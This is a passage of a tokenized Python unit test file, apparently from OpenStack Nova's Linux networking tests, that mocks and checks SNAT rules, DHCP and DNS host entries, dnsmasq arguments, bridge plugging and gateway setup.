fake_open , create = True ) : <EOL> self . assertFalse ( <EOL> linux_net . is_pid_cmdline_correct ( <NUM_LIT:1> , "<STR_LIT>" ) , <EOL> "<STR_LIT>" ) <EOL> fake_open = mock . mock_open ( <EOL> read_data = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> with mock . patch . object ( linux_net , '<STR_LIT>' , fake_open , create = True ) : <EOL> self . assertTrue ( <EOL> linux_net . is_pid_cmdline_correct ( <NUM_LIT:1> , "<STR_LIT>" ) , <EOL> '<STR_LIT>' ) <EOL> for err in ( IOError , OSError ) : <EOL> fake_open = mock . mock_open ( <EOL> read_data = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> fake_open . side_effect = err <EOL> with mock . patch . object ( linux_net , '<STR_LIT>' , fake_open , create = True ) : <EOL> self . assertFalse ( <EOL> linux_net . is_pid_cmdline_correct ( <NUM_LIT:1> , "<STR_LIT>" ) , <EOL> '<STR_LIT>' ) <EOL> class LinuxNetworkTestCase ( test . NoDBTestCase ) : <EOL> REQUIRES_LOCKING = True <EOL> def setUp ( self ) : <EOL> super ( LinuxNetworkTestCase , self ) . setUp ( ) <EOL> self . driver = driver . load_network_driver ( ) <EOL> self . driver . db = db <EOL> self . context = context . RequestContext ( '<STR_LIT>' , '<STR_LIT>' , <EOL> is_admin = True ) <EOL> def get_vifs ( _context , instance_uuid , use_slave ) : <EOL> return [ vif for vif in vifs if vif [ '<STR_LIT>' ] == <EOL> instance_uuid ] <EOL> def get_instance ( _context , instance_id ) : <EOL> return instances [ instance_id ] <EOL> self . stub_out ( '<STR_LIT>' , get_vifs ) <EOL> self . stub_out ( '<STR_LIT>' , get_instance ) <EOL> self . stub_out ( '<STR_LIT>' , <EOL> get_associated ) <EOL> def _test_add_snat_rule ( self , expected , is_external ) : <EOL> def verify_add_rule ( chain , rule ) : <EOL> self . assertEqual ( '<STR_LIT>' , chain ) <EOL> self . assertEqual ( expected , rule ) <EOL> self . called = True <EOL> self . stubs . Set ( linux_net . iptables_manager . ipv4 [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' , verify_add_rule ) <EOL> self . called = False <EOL> linux_net . add_snat_rule ( '<STR_LIT>' , is_external ) <EOL> if expected : <EOL> self . assertTrue ( self . called ) <EOL> def test_add_snat_rule_no_ext ( self ) : <EOL> self . flags ( routing_source_ip = '<STR_LIT>' ) <EOL> expected = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . _test_add_snat_rule ( expected , False ) <EOL> def test_add_snat_rule_ext ( self ) : <EOL> self . flags ( routing_source_ip = '<STR_LIT>' ) <EOL> expected = ( ) <EOL> self . _test_add_snat_rule ( expected , True ) <EOL> def test_add_snat_rule_snat_range_no_ext ( self ) : <EOL> self . flags ( routing_source_ip = '<STR_LIT>' , <EOL> force_snat_range = [ '<STR_LIT>' ] ) <EOL> expected = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . _test_add_snat_rule ( expected , False ) <EOL> def test_add_snat_rule_snat_range_ext ( self ) : <EOL> self . flags ( routing_source_ip = '<STR_LIT>' , <EOL> force_snat_range = [ '<STR_LIT>' ] ) <EOL> expected = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . _test_add_snat_rule ( expected , True ) <EOL> def test_update_dhcp_for_nw00 ( self ) : <EOL> self . flags ( use_single_default_gateway = True ) <EOL> self . mox . StubOutWithMock ( self . driver , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( fileutils , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( os , '<STR_LIT>' ) <EOL> self . driver . write_to_file ( mox . IgnoreArg ( ) , mox . IgnoreArg ( ) ) <EOL> self . driver . write_to_file ( mox . IgnoreArg ( ) , mox . IgnoreArg ( ) ) <EOL> fileutils . ensure_tree ( mox . IgnoreArg ( ) ) <EOL> fileutils . ensure_tree ( mox . IgnoreArg ( ) ) <EOL> fileutils . ensure_tree ( mox . IgnoreArg ( ) ) <EOL> fileutils . ensure_tree ( mox . IgnoreArg ( ) ) <EOL> fileutils . ensure_tree ( mox . IgnoreArg ( ) ) <EOL> fileutils . ensure_tree ( mox . IgnoreArg ( ) ) <EOL> fileutils . ensure_tree ( mox . IgnoreArg ( ) ) <EOL> os . chmod ( mox . IgnoreArg ( ) , mox . IgnoreArg ( ) ) <EOL> os . chmod ( mox . IgnoreArg ( ) , mox . IgnoreArg ( ) ) <EOL> self . mox . ReplayAll ( ) <EOL> self . driver . update_dhcp ( self . context , "<STR_LIT>" , networks [ <NUM_LIT:0> ] ) <EOL> def test_update_dhcp_for_nw01 ( self ) : <EOL> self . flags ( use_single_default_gateway = True ) <EOL> self . mox . StubOutWithMock ( self . driver , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( fileutils , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( os , '<STR_LIT>' ) <EOL> self . driver . write_to_file ( mox . IgnoreArg ( ) , mox . IgnoreArg ( ) ) <EOL> self . driver . write_to_file ( mox . IgnoreArg ( ) , mox . IgnoreArg ( ) ) <EOL> fileutils . ensure_tree ( mox . IgnoreArg ( ) ) <EOL> fileutils . ensure_tree ( mox . IgnoreArg ( ) ) <EOL> fileutils . ensure_tree ( mox . IgnoreArg ( ) ) <EOL> fileutils . ensure_tree ( mox . IgnoreArg ( ) ) <EOL> fileutils . ensure_tree ( mox . IgnoreArg ( ) ) <EOL> fileutils . ensure_tree ( mox . IgnoreArg ( ) ) <EOL> fileutils . ensure_tree ( mox . IgnoreArg ( ) ) <EOL> os . chmod ( mox . IgnoreArg ( ) , mox . IgnoreArg ( ) ) <EOL> os . chmod ( mox . IgnoreArg ( ) , mox . IgnoreArg ( ) ) <EOL> self . mox . ReplayAll ( ) <EOL> self . driver . update_dhcp ( self . context , "<STR_LIT>" , networks [ <NUM_LIT:0> ] ) <EOL> def _get_fixedips ( self , network , host = None ) : <EOL> return objects . FixedIPList . get_by_network ( self . context , <EOL> network , <EOL> host = host ) <EOL> def test_get_dhcp_hosts_for_nw00 ( self ) : <EOL> self . flags ( use_single_default_gateway = True ) <EOL> expected = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> fixedips = self . _get_fixedips ( networks [ <NUM_LIT:0> ] ) <EOL> actual_hosts = self . driver . get_dhcp_hosts ( self . context , networks [ <NUM_LIT:0> ] , <EOL> fixedips ) <EOL> self . assertEqual ( expected , actual_hosts ) <EOL> def test_get_dhcp_hosts_for_nw01 ( self ) : <EOL> self . flags ( use_single_default_gateway = True ) <EOL> expected = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> fixedips = self . _get_fixedips ( networks [ <NUM_LIT:1> ] , host = '<STR_LIT>' ) <EOL> actual_hosts = self . driver . get_dhcp_hosts ( self . context , networks [ <NUM_LIT:1> ] , <EOL> fixedips ) <EOL> self . assertEqual ( expected , actual_hosts ) <EOL> def test_get_dns_hosts_for_nw00 ( self ) : <EOL> expected = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> actual_hosts = self . driver . get_dns_hosts ( self . context , networks [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( expected , actual_hosts ) <EOL> def test_get_dns_hosts_for_nw01 ( self ) : <EOL> expected = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> actual_hosts = self . driver . get_dns_hosts ( self . context , networks [ <NUM_LIT:1> ] ) <EOL> self . assertEqual ( expected , actual_hosts ) <EOL> def test_get_dhcp_opts_for_nw00 ( self ) : <EOL> self . flags ( use_single_default_gateway = True ) <EOL> expected_opts = '<STR_LIT>' <EOL> fixedips = self . _get_fixedips ( networks [ <NUM_LIT:0> ] ) <EOL> actual_opts = self . driver . get_dhcp_opts ( self . context , networks [ <NUM_LIT:0> ] , <EOL> fixedips ) <EOL> self . assertEqual ( expected_opts , actual_opts ) <EOL> def test_get_dhcp_opts_for_nw00_no_single_default_gateway ( self ) : <EOL> self . flags ( use_single_default_gateway = False ) <EOL> expected_opts = '<STR_LIT>' <EOL> fixedips = self . _get_fixedips ( networks [ <NUM_LIT:0> ] ) <EOL> actual_opts = self . driver . get_dhcp_opts ( self . context , networks [ <NUM_LIT:0> ] , <EOL> fixedips ) <EOL> self . assertEqual ( expected_opts , actual_opts ) <EOL> def test_get_dhcp_opts_for_nw01 ( self ) : <EOL> self . flags ( use_single_default_gateway = True ) <EOL> expected_opts = "<STR_LIT>" <EOL> fixedips = self . _get_fixedips ( networks [ <NUM_LIT:1> ] , '<STR_LIT>' ) <EOL> actual_opts = self . driver . get_dhcp_opts ( self . context , networks [ <NUM_LIT:1> ] , <EOL> fixedips ) <EOL> self . assertEqual ( expected_opts , actual_opts ) <EOL> def test_get_dhcp_leases_for_nw00 ( self ) : <EOL> timestamp = timeutils . utcnow ( ) <EOL> seconds_since_epoch = calendar . timegm ( timestamp . utctimetuple ( ) ) <EOL> leases = self . driver . get_dhcp_leases ( self . context , networks [ <NUM_LIT:0> ] ) <EOL> leases = leases . split ( '<STR_LIT:\n>' ) <EOL> for lease in leases : <EOL> lease = lease . split ( '<STR_LIT:U+0020>' ) <EOL> data = get_associated ( self . context , <NUM_LIT:0> , address = lease [ <NUM_LIT:2> ] ) [ <NUM_LIT:0> ] <EOL> self . assertTrue ( data [ '<STR_LIT>' ] ) <EOL> self . assertTrue ( data [ '<STR_LIT>' ] ) <EOL> self . assertTrue ( int ( lease [ <NUM_LIT:0> ] ) > seconds_since_epoch ) <EOL> self . assertEqual ( data [ '<STR_LIT>' ] , lease [ <NUM_LIT:1> ] ) <EOL> self . assertEqual ( data [ '<STR_LIT:address>' ] , lease [ <NUM_LIT:2> ] ) <EOL> self . assertEqual ( data [ '<STR_LIT>' ] , lease [ <NUM_LIT:3> ] ) <EOL> self . assertEqual ( '<STR_LIT:*>' , lease [ <NUM_LIT:4> ] ) <EOL> def test_get_dhcp_leases_for_nw01 ( self ) : <EOL> self . flags ( host = '<STR_LIT>' ) <EOL> timestamp = timeutils . utcnow ( ) <EOL> seconds_since_epoch = calendar . timegm ( timestamp . utctimetuple ( ) ) <EOL> leases = self . driver . get_dhcp_leases ( self . context , networks [ <NUM_LIT:1> ] ) <EOL> leases = leases . split ( '<STR_LIT:\n>' ) <EOL> for lease in leases : <EOL> lease = lease . split ( '<STR_LIT:U+0020>' ) <EOL> data = get_associated ( self . context , <NUM_LIT:1> , address = lease [ <NUM_LIT:2> ] ) [ <NUM_LIT:0> ] <EOL> self . assertTrue ( data [ '<STR_LIT>' ] ) <EOL> self . assertTrue ( int ( lease [ <NUM_LIT:0> ] ) > seconds_since_epoch ) <EOL> self . assertEqual ( data [ '<STR_LIT>' ] , lease [ <NUM_LIT:1> ] ) <EOL> self . assertEqual ( data [ '<STR_LIT:address>' ] , lease [ <NUM_LIT:2> ] ) <EOL> self . assertEqual ( data [ '<STR_LIT>' ] , lease [ <NUM_LIT:3> ] ) <EOL> self . assertEqual ( '<STR_LIT:*>' , lease [ <NUM_LIT:4> ] ) <EOL> def test_dhcp_opts_not_default_gateway_network ( self ) : <EOL> expected = "<STR_LIT>" <EOL> fixedip = objects . FixedIPList . get_by_network ( self . context , <EOL> { '<STR_LIT:id>' : <NUM_LIT:0> } ) [ <NUM_LIT:0> ] <EOL> actual = self . driver . _host_dhcp_opts ( fixedip . virtual_interface_id ) <EOL> self . assertEqual ( expected , actual ) <EOL> def test_host_dhcp_without_default_gateway_network ( self ) : <EOL> expected = '<STR_LIT:U+002C>' . join ( [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) <EOL> fixedip = objects . FixedIPList . get_by_network ( self . context , <EOL> { '<STR_LIT:id>' : <NUM_LIT:0> } ) [ <NUM_LIT:0> ] <EOL> actual = self . driver . _host_dhcp ( fixedip ) <EOL> self . assertEqual ( expected , actual ) <EOL> def test_host_dhcp_truncated_hostname ( self ) : <EOL> expected = '<STR_LIT:U+002C>' . join ( [ '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) <EOL> fixedip = objects . FixedIPList . get_by_network ( self . context , <EOL> { '<STR_LIT:id>' : <NUM_LIT:2> } ) [ <NUM_LIT:0> ] <EOL> actual = self . driver . _host_dhcp ( fixedip ) <EOL> self . assertEqual ( expected , actual ) <EOL> def test_host_dns_without_default_gateway_network ( self ) : <EOL> expected = "<STR_LIT>" <EOL> fixedip = objects . FixedIPList . get_by_network ( self . context , <EOL> { '<STR_LIT:id>' : <NUM_LIT:0> } ) [ <NUM_LIT:0> ] <EOL> actual = self . driver . _host_dns ( fixedip ) <EOL> self . assertEqual ( expected , actual ) <EOL> def test_linux_bridge_driver_plug ( self ) : <EOL> """<STR_LIT>""" <EOL> def fake_execute ( * args , ** kwargs ) : <EOL> return "<STR_LIT>" , "<STR_LIT>" <EOL> self . stubs . Set ( utils , '<STR_LIT>' , fake_execute ) <EOL> def verify_add_rule ( chain , rule ) : <EOL> self . assertEqual ( '<STR_LIT>' , chain ) <EOL> self . assertIn ( '<STR_LIT>' , rule ) <EOL> self . stubs . Set ( linux_net . iptables_manager . ipv4 [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' , verify_add_rule ) <EOL> driver = linux_net . LinuxBridgeInterfaceDriver ( ) <EOL> driver . plug ( { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : False } , "<STR_LIT>" ) <EOL> def test_linux_ovs_driver_plug_exception ( self ) : <EOL> self . flags ( fake_network = False ) <EOL> def fake_execute ( * args , ** kwargs ) : <EOL> raise processutils . ProcessExecutionError ( '<STR_LIT>' ) <EOL> def fake_device_exists ( * args , ** kwargs ) : <EOL> return False <EOL> self . stubs . Set ( utils , '<STR_LIT>' , fake_execute ) <EOL> self . stubs . Set ( linux_net , '<STR_LIT>' , fake_device_exists ) <EOL> driver = linux_net . LinuxOVSInterfaceDriver ( ) <EOL> exc = self . assertRaises ( exception . OvsConfigurationFailure , <EOL> driver . plug , <EOL> { '<STR_LIT>' : '<STR_LIT>' } , '<STR_LIT>' ) <EOL> self . assertRegex ( <EOL> str ( exc ) , <EOL> re . compile ( "<STR_LIT>" , <EOL> re . DOTALL ) ) <EOL> self . assertIsInstance ( exc . kwargs [ '<STR_LIT>' ] , <EOL> processutils . ProcessExecutionError ) <EOL> def test_vlan_override ( self ) : <EOL> """<STR_LIT>""" <EOL> driver = linux_net . LinuxBridgeInterfaceDriver ( ) <EOL> info = { } <EOL> @ staticmethod <EOL> def test_ensure ( vlan , bridge , interface , network , mac_address , mtu ) : <EOL> info [ '<STR_LIT>' ] = interface <EOL> self . stubs . Set ( linux_net . LinuxBridgeInterfaceDriver , <EOL> '<STR_LIT>' , test_ensure ) <EOL> network = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> self . flags ( vlan_interface = "<STR_LIT>" ) <EOL> driver . plug ( network , "<STR_LIT>" ) <EOL> self . assertEqual ( "<STR_LIT>" , info [ '<STR_LIT>' ] ) <EOL> self . flags ( vlan_interface = "<STR_LIT>" ) <EOL> driver . plug ( network , "<STR_LIT>" ) <EOL> self . assertEqual ( "<STR_LIT>" , info [ '<STR_LIT>' ] ) <EOL> driver . plug ( network , "<STR_LIT>" ) <EOL> def test_flat_override ( self ) : <EOL> """<STR_LIT>""" <EOL> driver = linux_net . LinuxBridgeInterfaceDriver ( ) <EOL> info = { } <EOL> @ staticmethod <EOL> def test_ensure ( bridge , interface , network , gateway ) : <EOL> info [ '<STR_LIT>' ] = interface <EOL> self . stubs . Set ( linux_net . LinuxBridgeInterfaceDriver , <EOL> '<STR_LIT>' , test_ensure ) <EOL> network = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : False , <EOL> } <EOL> driver . plug ( network , "<STR_LIT>" ) <EOL> self . assertEqual ( "<STR_LIT>" , info [ '<STR_LIT>' ] ) <EOL> self . flags ( flat_interface = "<STR_LIT>" ) <EOL> driver . plug ( network , "<STR_LIT>" ) <EOL> self . assertEqual ( "<STR_LIT>" , info [ '<STR_LIT>' ] ) <EOL> def _test_dnsmasq_execute ( self , extra_expected = None ) : <EOL> network_ref = { '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT:label>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False } <EOL> def fake_execute ( * args , ** kwargs ) : <EOL> executes . append ( args ) <EOL> return "<STR_LIT>" , "<STR_LIT>" <EOL> def fake_add_dhcp_mangle_rule ( * args , ** kwargs ) : <EOL> executes . append ( args ) <EOL> self . stubs . Set ( linux_net , '<STR_LIT>' , fake_execute ) <EOL> self . stubs . Set ( linux_net , '<STR_LIT>' , <EOL> fake_add_dhcp_mangle_rule ) <EOL> self . stub_out ( '<STR_LIT>' , lambda * a , ** kw : None ) <EOL> self . stubs . Set ( linux_net , '<STR_LIT>' , lambda * a , ** kw : None ) <EOL> self . stubs . Set ( linux_net , '<STR_LIT>' , lambda * a , ** kw : None ) <EOL> dev = '<STR_LIT>' <EOL> default_domain = CONF . dhcp_domain <EOL> for domain in ( '<STR_LIT>' , default_domain ) : <EOL> executes = [ ] <EOL> self . flags ( dhcp_domain = domain ) <EOL> fixedips = self . _get_fixedips ( network_ref ) <EOL> linux_net . restart_dhcp ( self . context , dev , network_ref , fixedips ) <EOL> expected = [ '<STR_LIT>' , <EOL> '<STR_LIT>' % jsonutils . dumps ( CONF . dhcpbridge_flagfile ) , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' % CONF . dnsmasq_config_file , <EOL> '<STR_LIT>' % linux_net . _dhcp_file ( dev , '<STR_LIT>' ) , <EOL> '<STR_LIT>' % linux_net . _dhcp_file ( dev , '<STR_LIT>' ) , <EOL> '<STR_LIT>' % network_ref [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' , <EOL> "<STR_LIT>" % ( network_ref [ '<STR_LIT:label>' ] , <EOL> network_ref [ '<STR_LIT>' ] , <EOL> network_ref [ '<STR_LIT>' ] , <EOL> CONF . dhcp_lease_time ) , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' % linux_net . _dhcp_file ( dev , '<STR_LIT>' ) , <EOL> '<STR_LIT>' % CONF . dhcpbridge , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> if CONF . dhcp_domain : <EOL> expected . append ( '<STR_LIT>' % CONF . dhcp_domain ) <EOL> if extra_expected : <EOL> expected += extra_expected <EOL> self . assertEqual ( [ ( dev , ) , tuple ( expected ) ] , executes ) <EOL> def test_dnsmasq_execute ( self ) : <EOL> self . _test_dnsmasq_execute ( ) <EOL> def test_dnsmasq_execute_dns_servers ( self ) : <EOL> self . flags ( dns_server = [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> expected = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> self . _test_dnsmasq_execute ( expected ) <EOL> def test_dnsmasq_execute_use_network_dns_servers ( self ) : <EOL> self . flags ( use_network_dns_servers = True ) <EOL> expected = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> self . _test_dnsmasq_execute ( expected ) <EOL> def test_isolated_host ( self ) : <EOL> self . flags ( fake_network = False , <EOL> share_dhcp_address = True ) <EOL> self . stubs . Set ( linux_net , '<STR_LIT>' , <EOL> linux_net . IptablesManager ( ) ) <EOL> self . stubs . Set ( linux_net , '<STR_LIT>' , '<STR_LIT:test>' ) <EOL> executes = [ ] <EOL> def fake_execute ( * args , ** kwargs ) : <EOL> executes . append ( args ) <EOL> return "<STR_LIT>" , "<STR_LIT>" <EOL> self . stubs . Set ( utils , '<STR_LIT>' , fake_execute ) <EOL> driver = linux_net . LinuxBridgeInterfaceDriver ( ) <EOL> @ staticmethod <EOL> def fake_ensure ( bridge , interface , network , gateway ) : <EOL> return bridge <EOL> self . stubs . Set ( linux_net . LinuxBridgeInterfaceDriver , <EOL> '<STR_LIT>' , fake_ensure ) <EOL> iface = '<STR_LIT>' <EOL> dhcp = '<STR_LIT>' <EOL> network = { '<STR_LIT>' : dhcp , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : iface } <EOL> driver . plug ( network , '<STR_LIT>' ) <EOL> expected = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , iface , '<STR_LIT>' , dhcp , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , iface , '<STR_LIT>' , dhcp , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , iface , '<STR_LIT>' , dhcp , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , iface , '<STR_LIT>' , dhcp , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , iface , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , iface , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , iface , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , iface , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:-c>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:-c>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:-c>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:-c>' ) , <EOL> ] <EOL> self . assertEqual ( expected , executes ) <EOL> executes = [ ] <EOL> @ staticmethod <EOL> def fake_remove ( bridge , gateway ) : <EOL> return <EOL> self . stubs . Set ( linux_net . LinuxBridgeInterfaceDriver , <EOL> '<STR_LIT>' , fake_remove ) <EOL> driver . unplug ( network ) <EOL> expected = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , iface , '<STR_LIT>' , dhcp , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , iface , '<STR_LIT>' , dhcp , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , iface , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , iface , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> self . assertEqual ( expected , executes ) <EOL> def _test_initialize_gateway ( self , existing , expected , routes = '<STR_LIT>' ) : <EOL> self . flags ( fake_network = False ) <EOL> executes = [ ] <EOL> def fake_execute ( * args , ** kwargs ) : <EOL> executes . append ( args ) <EOL> if args [ <NUM_LIT:0> ] == '<STR_LIT>' and args [ <NUM_LIT:1> ] == '<STR_LIT>' and args [ <NUM_LIT:2> ] == '<STR_LIT>' : <EOL> return existing , "<STR_LIT>" <EOL> if args [ <NUM_LIT:0> ] == '<STR_LIT>' and args [ <NUM_LIT:1> ] == '<STR_LIT>' and args [ <NUM_LIT:2> ] == '<STR_LIT>' : <EOL> return routes , "<STR_LIT>" <EOL> if args [ <NUM_LIT:0> ] == '<STR_LIT>' : <EOL> return '<STR_LIT>' , '<STR_LIT>' <EOL> self . stubs . Set ( utils , '<STR_LIT>' , fake_execute ) <EOL> network = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> self . driver . initialize_gateway_device ( '<STR_LIT>' , network ) <EOL> self . assertEqual ( expected , executes ) <EOL> def test_initialize_gateway_moves_wrong_ip ( self ) : <EOL> existing = ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> expected = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> self . _test_initialize_gateway ( existing , expected ) <EOL> def test_initialize_gateway_ip_with_dynamic_flag ( self ) : <EOL> existing = ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> expected = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , 